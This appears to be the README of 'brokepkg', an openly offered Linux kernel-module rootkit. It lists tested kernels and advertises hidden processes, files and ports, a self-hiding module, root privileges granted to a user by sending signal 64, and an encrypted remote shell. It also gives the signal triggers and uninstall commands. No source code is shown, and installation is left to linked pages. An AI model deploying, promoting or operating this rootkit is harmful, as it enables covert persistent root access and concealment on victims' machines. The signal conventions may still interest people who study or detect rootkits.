BrokePkg

Brokepkg is a LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x and ARM64, with suport after kernel 5.7, without kallsyms_lookup_name.

Tested on

echo $(head -1 /etc/os-release|tr -d '"'|cut -d= -f2): $(uname -r)

• Ubuntu 23.04: 6.2.0-26-generic
• Ubuntu 22.04.1 LTS: 5.17.0-1026-oem
• Arch linux: 5.13.12-arch1-1
• Kali linux: 5.10.0-kali3-amd64
• Linux mint: 4.19.0-8-amd64
• Ubuntu 18.04.6 LTS: 4.15.0-194-generic
• Debian 9(stretch): 4.9.0-15-amd64
• Ubuntu 16.04.6 LTS: 4.4.0-142-generic

Features

• Hide/unhide any process by sending a signal 63;

• Sending a signal 31(to any pid) makes the module become (in)visible;

• Sending a signal 64(to any pid) makes the given user become root;

• Files or directories contain the MAGIC_HIDE become invisible;

• Sending a signal 62 to some port you make he invisible;

• Full TTY/PTY shell and traffic encrypted with openssl

Install

To install the rootkit, see this wiki page

Usage

You can see a usage manual here

Uninstall

Remove brokepkg invisibility to uninstall him

kill -31 0

Then remove the module

sudo rmmod brokepkg

References

• LKM HACKING:
  • http://www.ouah.org/LKM_HACKING.html
• Diamorphine:
  • https://github.com/m0nad/Diamorphine
• TheXcellerator:
  • https://xcellerator.github.io/posts/linux_rootkits_11/
  • https://github.com/xcellerator/linux_kernel_hacking
• Conviso:
  • https://blog.convisoappsec.com/linux-rootkits-hooking-syscalls/
• HardDisk:
  • https://harddisk.com.br/p/pt-br-rootkits-explicados/
• Reptile:
  • https://github.com/f0rb1dd3n/Reptile